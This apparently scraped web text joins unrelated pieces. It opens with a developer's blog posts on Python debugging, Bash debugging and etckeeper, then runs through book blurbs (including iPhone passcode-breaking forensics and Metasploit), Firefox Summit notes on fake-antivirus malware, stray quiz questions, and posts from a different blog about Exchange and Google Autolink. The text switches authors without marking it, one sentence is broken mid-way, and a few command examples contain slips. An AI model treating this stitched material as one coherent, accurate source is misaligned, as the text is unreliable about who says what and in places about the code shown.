To run the website, I'm using Apache2/mod_wsgi for the backend, and nginx as a frontend. I chose mod_wsgi because it's very flexible. As for nginx, I chose it because it integrates nicely with StaticGenerator, a Django middleware that caches pages as files on local disk. StaticGenerator has an important advantage over using Memcached with Django: cached pages are served by nginx without hitting Django at all, so it's much faster. A quick benchmark on my setup showed that it was 8 times faster. StaticGenerator can only cache full pages, but this is fine for my needs.
The blog feed now contains full articles (as opposed to short summaries). This should be more convenient to those who read the blog via the feed.
I did a lightning talk at PyCon 2010 based on my Python debugging techniques article. Here is the video. My talk starts around 7:30:
And here are the slides:
This article covers several techniques for debugging Python programs. The applicability of these techniques ranges from simple scripts to complex applications. The topics that are covered include launching an interactive console from within your program, using the Python debugger, and implementing robust logging. Various tips are included along the way to help you debug and fix problems quickly and efficiently.
The Python interactive console is an awesome tool for experimenting with Python code. It provides a read-eval-print loop that allows you to experiment with Python code easily and quickly, without having to write and run a complete program. Wouldn't be convenient if you could use the same technique to debug an existing program? Fortunately, this is already possible thanks to the code
module. This module has a function called interact()
that stops execution and gives you an interactive console to examine the current state of your program. To use this function, simply embed the following at the line were you want the console to start:
import code; code.interact(local=locals())
The resulting console inherits the local scope of the line on which code.interact()
is called. This enables you to check the current state of your program to understand its behavior and make any necessary corrections.
To exit the interactive console and continue with the execution of your program, press Ctrl+D
in Unix/Linux systems, or Ctrl+Z
in Windows. Alternatively, you can type exit()
in the console and hit enter to exit the console and abort your program.
When you need to examine the execution flow of your program, an interactive console is not going to be enough. For situations like this, you can use the Python debugger. It provides a full-fledged debugging environment that supports breakpoints, stepping through source code, stack inspection and much more. This debugger comes with the standard python distribution as a module named pdb
.
To learn how to use pdb
, let's write a simple program that calculates the first 10 Fibonacci numbers:
def main(): low, high = 0, 1 for i in xrange(10): print high low, high = high, low + high if __name__ == '__main__': main()
Assuming that the file name is fib.py
, we can run the program in pdb
using the following command:
$ python -m pdb fib.py
The command results in the following output:
> fib.py(1)<module>() -> def main(): (Pdb)
The first line of output contains the current module name, line number and function name (function name currently appears as <module>()
because we are still at module level). The second line of output contains the current line of source code that is being executed. pdb
also provides an interactive console to debug the program. This console is different from the familiar Python console. You can see its commands by typing help
and hitting enter. Also, typing help <command>
gives you help on the command you provided. Let's learn about these commands.
The list
command prints a few lines of context around the current line. Let's give it a try:
(Pdb) list 1 -> def main(): 2 low, high = 0, 1 3 for i in xrange(10): 4 print high 5 low, high = high, low + high 6 7 if __name__ == '__main__': 8 main() [EOF]
Next, let's step through our program. The next
command executes the current line and moves next.
(Pdb) next > fib.py(7)<module>() -> if __name__ == '__main__':
At this point, the main()
function has been defined, but not called. This is why the execution has jumped to the if
condition on line 7. Let's call next
again:
(Pdb) n > fib.py(8)<module>() -> main()
We are now about to call the main()
function. Running next
at this point will call main()
and move to the next line. Since we are at the end of the file, this means that the program will finish executing. But we don't want this; we want to step into the main()
function. To do this, we use the step
command:
(Pdb) step --Call-- > fib.py(1)main() -> def main():
From here, you can continue calling next
to step through the main()
. If at some point you want to examine the value of a variable, you can use the pp
command (short for pretty-print):
(Pdb) pp high 2
If you are done with examining the main()
function, you can either use the continue
command, which exits the debugging console and continues the execution of the program, or use the return
, which continues the execution until the current function returns. Alternatively, you can stop the execution altogether and abort by using the exit
command.
Next, we will learn about breakpoints. More often than not, you want to invoke the debugger at a particular function or line number, rather than step through the execution of the whole program. To do so, you can set a breakpoint and continue the execution of the program. When the breakpoint is reached, the debugger is invoked.
To set a breakpoint, use the break
command. It takes a file name and line number or function name. To break at line 4 in fib.py, use:
(Pdb) break fib.py:4
To break when the main()
function is called, use:
(Pdb) break fib.main
Furthermore, you can attach a condition to the breakpoint. Execution breaks only if this condition is True
. For example, to break at line 4 in fib.py when high
is greater than 10, use:
(Pdb) break fib.py:4, high > 10
Now it's time for my favorite feature in pdb
. It you put the following snippet somewhere in your program and run it normally, execution will stop and a debugging session will start when this line is reached:
import pdb; pdb.set_trace()
This approach is very convenient because it does not require launching your program in a special way or remembering to set breakpoints. You simply add the line above and start the program normally, and the debugger will be invoked exactly where you want. In practice, I think you will use this snippet to start pdb
most of the time.
Finally, pdb
commands have short forms. The following table summarizes the commands presented in this section, and their short forms:
Command | Short form | Description |
---|---|---|
break | b | Set a breakpoint. |
continue | c | Continue with program execution. |
exit | q | Abort the program. |
help | h | Print list of commands or help for a given command. |
list | l | Show source code around current line. |
return | r | Continue execution until the current function returns. |
A primitive way of debugging programs is to embed print
statements through out the code to track execution flow and state. However, this approach can quickly become unmaintainable for a number of reasons:
print
statements that are scattered over the code.Python provides an alternative to debug print
statements that doesn't suffer from the shortcomings above. This alternative comes in the form of a module called logging
, and it is very powerful and easy to use.
Let's start with a simple example. The following snippet imports the logging
module and sets the logging level to debug:
import logging logging.basicConfig(level=logging.DEBUG)
The call to logging.basicConfig()
should be done once when your program starts. Now, whenever you want to print a debug message, call logging.debug()
:
logging.debug('This is a debug message.')
This will send the following string to stderr
:
DEBUG:root:This is a debugging message.
DEBUG
indicates that this is a debug message. root
indicates that this is the root logger, as it is possible to have multiple loggers (don't worry about this for now).
Now we have a better logging system that can be globally switched on and off. To turn off debug messages, simply omit the level
argument when calling logging.basicConfig()
:
logging.basicConfig()
To take full advantage of the logging
module, let's have a look at some of the options that can be provided to logging.basicConfig()
:
Argument | Description |
---|---|
filename | Send log messages to a file. |
filemode | The mode to open the file in (defaults to 'a' ). |
format | The format of log messages. |
dateformat | date/time format in log messages. |
level | Level of messages to be printed (more on this later). |
For example, to configure the logging module to send debug messages to a file called debug.log
, use:
logging.basicConfig(level=logging.DEBUG, filename='debug.log')
Log messages will be appended to debug.log
if the file already exists. This means that your log messages will be kept even if you run your program multiple times.
To add date/time to your log messages, use:
logging.basicConfig(level=logging.DEBUG, filename='debug.log', format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
This will result in log messages like the following:
2009-08-30 23:30:49 DEBUG: This is a debug message.
The logging
supports multiple levels of log messages in addition to DEBUG
. Here is the full list:
Level | Function |
---|---|
logging.CRITICAL | logging.critical() |
logging.ERROR | logging.error() |
logging.WARNING | logging.warning() |
logging.INFO | logging.info() |
logging.DEBUG | logging.debug() |
Setting the logging level to a value enables log messages for this level and all levels above it. So if you set the level to logging.WARNING
, you will get WARNING
, ERROR
and CRITICAL
messages. This allows you to have different levels of log verbosity.
Before I conclude this section, I will provide a simple template for enabling logging functionality in your programs. This template uses command-line flags to change the level logging, which is more convenient that modifying source code.
import logging import optparse LOGGING_LEVELS = {'critical': logging.CRITICAL, 'error': logging.ERROR, 'warning': logging.WARNING, 'info': logging.INFO, 'debug': logging.DEBUG} def main(): parser = optparse.OptionParser() parser.add_option('-l', '--logging-level', help='Logging level') parser.add_option('-f', '--logging-file', help='Logging file name') (options, args) = parser.parse_args() logging_level = LOGGING_LEVELS.get(options.logging_level, logging.NOTSET) logging.basicConfig(level=logging_level, filename=options.logging_file, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S') # Your program goes here. # You can access command-line arguments using the args variable. if __name__ == '__main__': main()
By default, the logging
module prints critical, error and warning messages. To change this so that all levels are printed, use:
$ ./your-program.py --logging=debug
To send log messages to a file called debug.log
, use:
$ ./your-program.py --logging-level=debug --logging-file=debug.log
Bash is the default scripting language in most Linux systems. Its usage ranges from an interactive command interpreter to a scripting language for writing complex programs. Debugging facilities are a standard feature of compilers and interpreters, and bash is no different in this regard. In this article, I will explain various techniques and tips for debugging Bash scripts.
You can instruct Bash to print debugging output as it interprets you scripts. When running in this mode, Bash prints commands and their arguments before they are executed.
To see how this works, let's try it on an example script. The following simple script greets the user and prints the current date:
#!/bin/bash echo "Hello $USER," echo "Today is $(date +'%Y-%m-%d')"
To trace the execution of the script, use bash -x
to run it:
$ bash -x example_script.sh + echo 'Hello ayman,' Hello ayman, ++ date +%Y-%m-%d + echo 'Today is 2009-08-24' Today is 2009-08-24
In this mode, Bash prints each command (with its expanded arguments) before executing it. Debugging output is prefixed with a number of +
signs to indicate nesting. This output helps you see exactly what the script is doing, and understand why it is not behaving as expected.
In large scripts, it may be helpful to prefix this debugging output with the script name, line number and function name. You can do this by setting the following environment variable:
export PS4='+${BASH_SOURCE}:${LINENO}:${FUNCNAME[0]}: '
Let's trace our example script again to see the new debugging output:
$ bash -x example_script.sh +example_script.sh:2:: echo 'Hello ayman,' Hello ayman, ++example_script.sh:3:: date +%Y-%m-%d +example_script.sh:3:: echo 'Today is 2009-08-24' Today is 2009-08-24
Sometimes, you are only interested in tracing one part of your script. This can be done by calling set -x
where you want to enable tracing, and calling set +x
to disable it. Let's apply this to our example script:
#!/bin/bash echo "Hello $USER," set -x echo "Today is $(date %Y-%m-%d)" set +x
Now, let's run the script:
$ ./example_script.sh Hello ayman, ++example_script.sh:4:: date +%Y-%m-%d +example_script.sh:4:: echo 'Today is 2009-08-24' Today is 2009-08-24 +example_script.sh:5:: set +x
Notice that we no longer need to run the script with bash -x
.
Tracing script execution is sometimes too verbose, especially if you are only interested in a limited number of events, like calling a certain function or entering a certain loop. In this case, it's better to log the events you are interested in. Logging can be achieved with something as simple as a function that prints a string to stderr
:
_log() { if [ "$_DEBUG" == "true" ]; then echo 1>&2 "$@" fi }
Now you can embed logging messages into your script by calling this function:
_log "Copying files..."
cp src/* dst/
Log messages are printed only if the _DEBUG
variable is set to true
. This allows you to toggle the printing of log messages depending on your needs. You don't need to modify your script in order to change this variable; you can set it on the command line:
$ _DEBUG=true ./example_script.sh
If you are writing a complex script and you need a full-fledged debugger to debug it, then you can use bashdb, the Bash debugger. The debugger contains all the features that you would expect, like breakpoints, stepping in and out of functions, and attaching to running scripts. Its interface is a bit similar to gdb. You can read the documentation of bashdb for more information.
Keeping a version history of files under /etc
is essential for maintaining a healthy system. The benefits of tracking changes to /etc
include:
You can set up your own repository to track changes to /etc
, or you can use a tool called etckeeper to handle the setup for you. This tool supports multiple version control systems, including Git, Mercurial and Bazaar. It integrates with the package management systems of a number of Linux distros, including APT (used by Debian, Ubuntu), YUM (RedHat, CentOS, Fedora), Pacman (Arch Linux). Using etckeeper instead of rolling your own has some advantages:
/etc
after installing packages./etc
but usually do not benefit from version control (like some cache files).Read on to learn how to install, configure and use etckeeper.
To install etckeeper on Debian or Ubuntu, run:
$ sudo apt-get install etckeeper
If you use another Linux distro, search the packcage list in your package manager. If etckeeper supports your system, you will probably find it there. Otherwise, you can download the source from the official site of etckeeper.
Next, let's configure etckeeper. Open /etc/etckeeper/etckeeper.conf
in your favorite editor. The first option that you need to look at is VCS
, which is the version control system you want to use. By default it's set to git
, but you can change it to hg
or bzr
depending on your preference. I use git myself, but most of this article should apply to etckeeper regardless of the version control system you choose.
Another option that I recommend looking at is AVOID_COMMIT_BEFORE_INSTALL
. By default, etckeeper will automatically commit any pending changes when you install packages. I find this behavior undesirable, as it may commit unfinished changes. I disable it by setting AVOID_COMMIT_BEFORE_INSTALL
to 1
.
If you installed etckeeper from source, have a look at HIGHLEVEL_PACKAGE_MANAGER
and LOWLEVEL_PACKAGE_MANAGER
and change them depending on the package manager of your system.
With this, we are done with configuring etckeeper. Let's create a repository now:
$ cd /etc $ sudo etckeeper init $ sudo etckeeper commit "Initial import"
This will create an empty repository and then commit the contents of your /etc
directory to it.
From here, using etckeeper is not different from using the version control system you selected. Let's say you want to change your MySQL config; you can edit the file and then commit it as usual:
$ cd /etc $ sudo vi /etc/mysql/my.cnf $ sudo git commit -m "Commit message"
If you need to install a package in the middle of a change to /etc
, you need to record the change and revert to a clean state, install the package, and apply your recorded change again. In git, this is done like this:
$ cd /etc $ sudo vi mysql/my.cnf # Make a change. $ sudo git stash # Record the change and revert to a clean state. $ sudo apt-get install bc # Install a package. $ sudo git stash apply # Apply the recorded change.
See the man page of git-stash for more information.
Enormous quantities of data go unused or underused today, simply because people can't visualize the quantities and relationships in it. Using a downloadable programming environment developed by the author, Visualizing Data demonstrates methods for representing data accurately on the Web and elsewhere, complete with user interaction, animation, and more. How do the 3.1 billion A, C, G and T letters of the human genome compare to those of a chimp or a mouse? What do the paths that millions of visitors take through a web site look like? With Visualizing Data, you learn how to answer complex questions like these with thoroughly interactive displays. We're not talking about cookie-cutter charts and graphs. This book teaches you how to design entire interfaces around large, complex data sets with the help of a powerful new design and prototyping tool called "Processing." Used by many researchers and companies to convey specific data in a clear and understandable manner, the Processing beta is available free. With this tool and Visualizing Data as a guide, you'll learn basic visualization principles, how to choose the right kind of display for your purposes, and how to provide interactive features that will bring users to your site over and over. This book teaches you: The seven stages of visualizing data -- acquire, parse, filter, mine, represent, refine, and interact How all data problems begin with a question and end with a narrative construct that provides a clear answer without extraneous details Several example projects with the code to make them work Positive and negative points of each representation discussed. The focus is on customization so that each one best suits what you want toconvey about your data set The book does not provide ready-made "visualizations" that can be plugged into any data set. Instead, with chapters divided by types of data rather than types of display, you'll learn how each visualization conveys the unique properties of the data it represents -- why the data was collected, what's interesting about it, and what stories it can tell. Visualizing Data teaches you how to answer questions, not simply display information.
"This book is a must for anyone attempting to examine the iPhone. The level of forensic detail is excellent. If only all guides to forensics were written with this clarity!" -Andrew Sheldon, Director of Evidence Talks, computer forensics experts With iPhone use increasing in business networks, IT and security professionals face a serious challenge: these devices store an enormous amount of information. If your staff conducts business with an iPhone, you need to know how to recover, analyze, and securely destroy sensitive data. iPhone Forensics supplies the knowledge necessary to conduct complete and highly specialized forensic analysis of the iPhone, iPhone 3G, and iPod Touch. This book helps you: Determine what type of data is stored on the device Break v1.x and v2.x passcode-protected iPhones to gain access to the device Build a custom recovery toolkit for the iPhone Interrupt iPhone 3G's "secure wipe" process Conduct data recovery of a v1.x and v2.x iPhone user disk partition, and preserve and recover the entire raw user disk partition Recover deleted voicemail, images, email, and other personal data, using data carving techniques Recover geotagged metadata from camera photos Discover Google map lookups, typing cache, and other data stored on the live file system Extract contact information from the iPhone's database Use different recovery strategies based on case needs And more. iPhone Forensics includes techniques used by more than 200 law enforcement agencies worldwide, and is a must-have for any corporate compliance and disaster recovery plan.
This is the first book available for the Metasploit Framework (MSF), which is the attack platform of choice for one of the fastest growing careers in IT security: Penetration Testing. The book and companion Web site will provide professional penetration testers and security researchers with a fully integrated suite of tools for discovering, running, and testing exploit code.This book discusses how to use the Metasploit Framework (MSF) as an exploitation platform. The book begins with a detailed discussion of the three MSF interfaces: msfweb, msfconsole, and msfcli .This chapter demonstrates all of the features offered by the MSF as an exploitation platform. With a solid understanding of MSF's capabilities, the book then details techniques for dramatically reducing the amount of time required for developing functional exploits.By working through a real-world vulnerabilities against popular closed source applications, the reader will learn how to use the tools and MSF to quickly build reliable attacks as standalone exploits. The section will also explain how to integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the reader will come to understand the advantages of exploitation frameworks. The final section of the book examines the Meterpreter payload system and teaches readers to develop completely new extensions that will integrate fluidly with the Metasploit Framework. · A November 2004 survey conducted by "CSO Magazine" stated that 42% of chief security officers considered penetration testing to be a security priority for their organizations· The Metasploit Framework is the most popular open source exploit platform, and there are no competing books· The book's companion Web site offers all of the working code and exploits contained within the book
A quick guide to everything anyone would want to know about the soaringly popular Internet programming language, Python. Provides an introduction to new features introduced in Python 1.6, and topics covered include regular expressions, extending Python, and OOP. The CD-ROM includes the source code for all of the examples in the text. Softcover.
Coauthored by Larry Wall, the creator of Perl, this book is the authoritative guide to Perl version 5, the scripting utility now established as the programming tool of choice for the World Wide Web, UNIX system administration, and a vast range of other applications. Learn how to use this versatile cross-platform programming language to solve unique programming challenges. This heavily revised second edition of Programming Perl contains a full explanation of Perl version 5.003 features. It covers Perl language and syntax, functions, library modules, references, and object-oriented features. It also explores invocation options for Perl and the utilities that come with it, debugging, common mistakes, efficiency, programming style, distribution and installation of Perl, and much more. Reviewers have called this book splendid, definitive, and well worth the price.
Pro Drupal Development is strongly recommended for any PHP programmer who wants a truly in-depth look at how Drupal works and how to make the most of it. — Michael J. Ross, Web developer/Slashdot contributor Drupal is one of the most popular content management systems in use today. With it, you can create a variety of community-driven sites, including blogs, forums, wiki-style sites, and much more. Pro Drupal Development was written to arm you with knowledge to customize your Drupal installation however you see fit. The book assumes that you already possess the knowledge to install and bring a standard installation online. Then authors John VanDyk and Matt Westgate delve into Drupal internals, showing you how to truly take advantage of its powerful architecture. Youll learn how to create your own modules, develop your own themes, and produce your own filters. You'll learn the inner workings of each key part of Drupal, including user management, sessions, the node system, caching, and the various APIs available to you. Of course, your Drupal-powered site isnt effective until you can efficiently serve pages to your visitors. As such, the authors have included the information you need to optimize your Drupal installation to perform well under high-load situations. Also featured is information on Drupal security and best practices, as well as integration of Ajax and the internationalization of your Drupal web site. Simply put, if you are working with Drupal at all, then you need this book.
UntitledNamed after the Monty Python comedy troupe, Python is an interpreted, open-source, object-oriented programming language. It's also free and runs portably on Windows, Mac OS, Unix, and other operating systems. Python can be used for all manner of programming tasks, from CGI scripts to full-fledged applications. It is gaining popularity among programmers in part because it is easier to read (and hence, debug) than most other programming languages, and it's generally simpler to install, learn, and use. Its line structure forces consistent indentation. Its syntax and semantics make it suitable for simple scripts and large programs. Its flexible data structures and dynamic typing allow you to get a lot done in a few lines. To learn it, you'll need is some basic programming experience and a copy of Python: Visual QuickStart Guide.In patented Visual QuickStart Guide fashion, the book doesn't just tell you how to use Python to develop applications, it shows you, breaking Python into easy-to-digest, step-by-step tasks and providing example code. Python: Visual QuickStart Guide emphasizes the core language and libraries, which are the building blocks for programs. Author Chris Fehily starts with the basics - expressions, statements, numbers, strings - then moves on to lists, dictionaries, functions, and modules before wrapping things up with straightforward discussions of exceptions and classes. Some additional topics covered include:- Object-oriented programming- Working in multiple operating systems- Structuring large programs- Comparing Python to C, Perl, and Java- Handling errors gracefully.
This book constitutes the refereed proceedings of the 6th International Workshop on Algorithms and Models for the Web-Graph, WAW 2009, held in Barcelona, Spain, in February 2009 - co-located with WSDM 2009, the Second ACM International Conference on Web Search and Data Mining.The 14 revised full papers presented were carefully reviewed and selected from numerous submissions for inclusion in the book. The papers address a wide variety of topics related to the study of the Web-graph such as theoretical and empirical analysis of the Web graph and Web 2.0 graphs, random walks on the Web and Web 2.0 graphs and their applications, and design and performance evaluation of the algorithms for social networks. The workshop papers have been naturally clustered in three topical sections on graph models for complex networks, pagerank and Web graph, and social networks and search.
The implementation of stored procedures in MySQL 5.0 a huge milestone -- one that is expected to lead to widespread enterprise adoption of the already extremely popular MySQL database. If you are serious about building the web-based database applications of the future, you need to get up to speed quickly on how stored procedures work -- and how to build them the right way. This book, destined to be the bible of stored procedure development, is a resource that no real MySQL programmer can afford to do without. In the decade since MySQL burst on the scene, it has become the dominant open source database, with capabilities and performance rivaling those of commercial RDBMS offerings like Oracle and SQL Server. Along with Linux and PHP, MySQL is at the heart of millions of applications. And now, with support for stored procedures, functions, and triggers in MySQL 5.0, MySQL offers the programming power needed for true enterprise use. MySQL's new procedural language has a straightforward syntax, making it easy to write simple programs. But it's not so easy to write secure, easily maintained, high-performance, and bug-free programs. Few in the MySQL world have substantial experience yet with stored procedures, but Guy Harrison and Steven Feuerstein have decades of combined expertise. In "MySQL Stored Procedure Programming," they put that hard-won experience to good use. Packed with code examples and covering everything from language basics to application building to advanced tuning and best practices, this highly readable book is the one-stop guide to MySQL development. It consists of four majorsections: MySQL stored programming fundamentals -- tutorial, basic statements, SQL in stored programs, and error handling Building MySQL stored programs -- transaction handling, built-in functions, stored functions, and triggers MySQL stored programs in applications -- using stored programs with PHP, Java, Perl, Python, and .NET (C# and VB.NET) Optimizing MySQL stored programs -- security, basic and advanced SQL tuning, optimizing stored program code, and programming best practices A companion web site contains many thousands of lines of code, that you can put to use immediately. Guy Harrison is Chief Architect of Database Solutions at Quest Software and a frequent speaker and writer on MySQL topics. Steven Feuerstein is the author of "Oracle PL/SQL Programming," the classic reference for Oracle stored programming for more than ten years. Both have decades of experience as database developers, and between them they have authored a dozen books.
The authoritative, hands-on guide to advanced MySQL programming and administration techniques for high performance is here. MySQL Database Design and Tuning is the only guide with coverage of both the basics and advanced topics, including reliability, performance, optimization and tuning for MySQL. This clear, concise and unique source for the most reliable MySQL performance information will show you how to:
My author copies of "Django 1.0 Website Development" have arrived. This is the second edition of my Django book. Django is a framework for building web applications in Python. This book explains how to assemble Django's features and take advantage of its power to design, develop, and deploy a fully-featured web site.
The new edition has been updated to Django 1.0. The key topics that the reader will learn from the book are:
The full table of contents is available.
The book is available in paper and PDF formats at Packt Publishing. It is also available from all major book sellers like Amazon.
Writing the book and revising it have been an enjoyable experience for me. The feeling of accomplishment when my copies arrived is satisfying. I sincerely hope that readers find the book interesting and useful. If you have questions or comments, don't hesitate to email me!
More photos of the book are available at my Picasa web albums.
We have often come across the message “Webpage has expired” when attempting to access a recently accessed page. This message comes as a result of the web server specifying an expiration time for the webpage when it is stored on the browser’s cache. How does a web server specify the life time for a page to the browser’s cache?
The main piece of news for day 2 in the Firefox Summit 2008 is that everyone is now trapped in the small town of Whistler after that a rock slide cut off the highway that connects Whistler with Vancouver. Fortunately, nobody was injured because of this. However, clearing the massive boulders that are blocking the highway will take 5 days according to official sources. Since the summit ends this Thursday, most attendants need to go to the Vancouver Airport on Friday to catch flights to their home countries. The cause of this rock slide is unclear at the moment, but there are people in the summit who are speculating whether a company whose name starts with an 'M' is behind all of this. A bug was filed in Bugzilla to track the issue, and some of the currently-proposed solutions involve riding bears, taking boats, or taking helicopters. In reality however, we will most likely end up going through a different route that takes around 8 hours in a bus.
Back to the events of the summit itself, day 2 started with presentations on the next release of Firefox. Version 3.1 is planned to be released in the 4th quarter of this year. It brings several interesting capabilities to the rendering engine of Firefox, and improves the overall performance of the browser. One important addition is the implementation of the JavaScript Selectors API. This API provides a better and more efficient method of getting elements from the DOM tree. If you are familiar with jQuery or Prototype, you probably know that these libraries provide a function to get a group of DOM elements by matching against a set of CSS selectors. These libraries implement such functionality using JavaScript. Since traversing DOM elements and matching CSS selectors can be expensive operations in JavaScript, it would be much better if this functionality is implemented in the JavaScript engine using native code. And this is exactly what the selectors API is about: provide a standard set of JavaScript functions to get DOM elements using CSS selectors. Firefox 3.1 will contain this API, and even in the current alpha release, the improvements in performance are significant.
Firefox 3.1 also brings improvements to the canvas element, and provide support for the OGG Theora video technologies. Demos were presented to show off these new features, and the results looked very nice. However, I'm not sure how the adoption is going to be for these features, given that other browsers may or may not support them.
Next, an interesting and relatively new project called Fennec was presented. Fennec is about bringing Firefox to mobile phones. Even through the project is still in the early stages, there is already a very functional build which was demonstrated.
The next talk I attended was about Thunderbird localization. Thunderbird 3 is currently in alpha stages. Beta 1 is expected in September 2008, Beta 2 is expected in November 2008, and the final release will happen in January 2009. Thunderbird localization now has a new coordinator, Simon Paquet, and he's very enthusiastic about getting new locales (including Arabic). This is an excellent opportunity to finally have an official release of Arabic Thunderbird, and I think a good timing to start importing the current localization to version 3 is around the beta 1 release in September.
Security is very important for a web browser, and one of the selling points for Firefox is the security it offers. I attended two talks on this topic. The first one was a demonstration of the current trends in malware. With malware detection and blocking technologies becoming more advanced, malware authors are finding more sophisticated techniques to trick browsers and/or users to install malware on computers. I haven't used a Windows computer in a very long time, so I wasn't aware of what's going on these days in the world of malware. One interesting attack that was demonstrated was a website that masqueraded as an anti-virus application and tried to convince the user that a virus was found on their computer. Technically, this malicious website consisted of a series of animated images that looked like an anti-virus program starting up, scanning the local hard disk, and then offering the user an executable program claiming that it will clean virus infections, while in reality it will infect the computer with malware. All of this was done in the main window of the browser, without any popups. This is a form of social engineering attack, but it is very difficult to detect and block. How would one detect and block such an attack? This was the open question during the talk, and it resulted in a very interesting discussion on various approaches to handle such issues.
The second talk was about writing secure software. It went through a series of practices that help in designing and building a secure application. It also used examples from actual vulnerabilities that were found in Firefox, which I found particularly interesting.
Another day, another set of interesting talks. I'm excited about the final day of the summit. Hopefully, it will be as interesting as the previous two days. In addition to the talks, this summit has been a wonderful opportunity to meet interesting people from various parts of the Mozilla project, and from all over the world.
Same origin policy of browser prevents scripts loaded in one domain to access resource from another domain. However, this policy imposes several limitations to Web 2.0 apps and restricts interactivity between sites. A new proposal has been formed by W3C, to incorporate Web 2.0 developer’s demands, by allowing cross site requests. Which among the following is the said proposal?
So, you might have seen Gary or Ed mention this, but now that it's underway I have time to talk about it too. 3sharp is presenting a 10-city roadshow called "Optimizing Communication and Collaboration with Microsoft Technologies". The thrust behind the roadshow is simple: you can get a lot of mileage from Microsoft's investment in communications and collaboration technologies by deploying them in parallel with-- not necessarily as a replacement for-- whatever you're currently using. The structure of the events is simple: if you're a developer, you go to John's excellent class on how to extend Notes apps by having them produce, or consume, data from .NET web services; if you're a technical decision maker, you come hear the Burton Group's forecast on market dynamics in the C&C space, then I get to explain the pieces of MS' collaboration strategy, with copious use of demos.
Our first event in Dallas this week went really well. My content was well-received; it was obvious to the attendees that we're not suggesting they rip-and-replace their existing infrastructures (well, maybe if you're using OCS). Instead, we're making a solid case for extending their business systems with Microsoft's collaboration and communications platform. Next stop: Waltham! (Personal to Ed Brill: the Chicago show got moved to 4/21, so please adjust your calendar!)
In this month's Windows IT Pro, I wrote a buyer's guide article on Exchange recovery tools. This just in from an admin who works for the city government of a large city in Virginia:
Thanks for putting this article together. I just wanted to let you know we are just about to implement a NetApp solution for Exchange 2003 and without NetApp's Single Mailbox Recovery product, not mentioned as needed in this article, it is impossible to Backup and Recover Individual Mailboxes, Recover Individual Items or Search and Query for Items to be Recovered. I wanted to let you know because their software is expensive and this product is an extra cost.
Yikes! My apologies for that. When I do a buyers' guide, I write the article itself that accompanies the guide, and I work with the magazine's editors to come up with a list of criteria, plus a list of products that meet those criteria. In this case, the selection criteria included the ability to do brick-level backups, the ability to search and query, and the ability to recover individual items. We don't usually ask vendors to list out all the products, submodules, agents, or other components that have to be installed to meet the criteria. For example, for backup solutions we don't ask whether there's a separate Exchange agent or not. Mail like this makes me think that maybe we should, though, because it's frustrating to buy what you think is a complete solution, only to find out that you have to lay out even more money to get the whole package.
Lots of discussion about Autolink, which is good. So far, though, I haven't seen very much discussion around Adzilla. Their white paper for service providers describes their services for stripping banner ads (and other ad-related content) and letting the ISP insert its own ads. Yikes. I can't imagine that content providers are going to be too happy about that. Imagine going to CNN.com and seeing locally-inserted ads from your cable modem provider.
Back in November, I wrote about a problem with Entourage and Exchange transaction logs-- sending a message that was larger than the Exchange global message size limit would cause Entourage to resubmit the message each time it tried to send mail, and this would lead to a flood of transaction log files. There's now a server-side hotfix for this problem: MS KB 889525 (An e-mail message stays in the Outbox and the Exchange Server 2003 transaction log files grow when an Entourage user tries to send a message that exceeds the size limit in Global Settings).
Dang, I never thought I'd see this happen: the Microsoft Security Response Center (MSRC) has a blog. Pretty cool, and definitely good news for MS' ongoing attempts to broaden the degree of security communications.
You might remember that I ditched the Google Toolbar a couple of months ago. Steve Rubel is reporting on another good reason to do so: the newest version includes a feature called Autolink. Greg Linden explains it very simply: with this feature turned on, Google's modifying web page content to add its own links. For example, addresses are linked to Google Maps pages. Book ISBNs and package tracking numbers are linked too.
The folks at Google Blogoscoped toss this off with "talk about the Google OS taking over our lives", but you know what? Microsoft tried something similar with their IE support for smart tags. Smart tags are exceptionally useful in Office, because you can easily write your own smart tag code to recognize objects unique to your business (like chemical compound names for a pharmaceutical company). I wrote one that recognizes scripture verses (you know, like "John 3:16"). When MS proposed extending this feature to IE, the furor was incredible. Walt Mossberg, Dave Winer, Dan Gillmor, and a host of other influencers immediately started screaming that Microsoft was taking control over web content and generally acting like an 800-lb gorilla. The EFF even opined that the MS smart tag implementation might be illegal. In fact, here's what Chris Kaminski had to say:
Even if smart tags don’t violate copyright or deceptive trade laws, they still violate the integrity of the web. Part of the appeal of the web is that it allows anyone to publish anything, to take their thoughts, feelings and opinions and put them before the world with no censors or marketroids in the way. By adding smart tags to web pages, Microsoft is interposing itself between authors and their audience. Microsoft told Walter Mossberg “the feature will spare users from ‘under-linked’ sites.” Microsoft is in effect deciding how authors should write, and how developers should build, websites.
Worse, Microsoft’s decisions may be at odds with the intent of the site’s author or developer. If an Internet Explorer 6 user visits Travelocity and looks at a page with information on visiting Nice, France, the smart tag that aggravated Thurrott will link the word “Nice” to Microsoft’s Expedia site. With smart tags, Microsoft is able to insert their ads right into competitors’ sites.
Microsoft is crossing the Rubicon of journalistic and artistic integrity. Editors and authors no longer have final authority over what their sites say; Microsoft and its partners do. For a preview of what the web may look like for Internet Explorer 6 users who also have Office XP or Windows XP installed, take a look at InteractiveWeek’s Connie Guglielmo’s preview. With smart tags, Microsoft is effectively extending its role from being a supplier of tools people use to view content to being the executive editor and creative director of every site on the web.
So, check that out: Kaminski accuses Microsoft of "deciding how authors should write", "insert[ing] their ads right into competitors' sites", and becoming "the executive editor and creative director of every site on the web". He left out barratry and mopery and dopery in the spaceways, but that's still a pretty damning list.
Now Google's doing the same thing. Will we see the same reaction?
My guess is "no". Google's widely publicized mantra of "don't be evil" is increasingly often being used to excuse behavior for which Microsoft, Oracle, or IBM would be roundly condemned. This is just the latest such instance. Don't get me wrong: as a user, I think Autolink could potentially be a useful feature (but then I thought the same thing about smart tag support in IE). As a web content provider, I'm not comfortable with the idea that another entity (which may not have my best interests at heart) is modifying my content before someone else sees it. If Microsoft was wrong then, so Google is wrong now.
SearchEngineWatch says "the commercial possibilities are massive"-- I'd have to agree. My somewhat cynical guess, though, is that , and that raises the question of whether it's OK for Google to make money by modifying other people's web content. My guess would be "not so much"-- look back at the Kaminski quote and see the part about ad insertion again. On the other hand, I see that Dave Winer is labeling this as "a line they must not cross"-- an encouraging early sign.
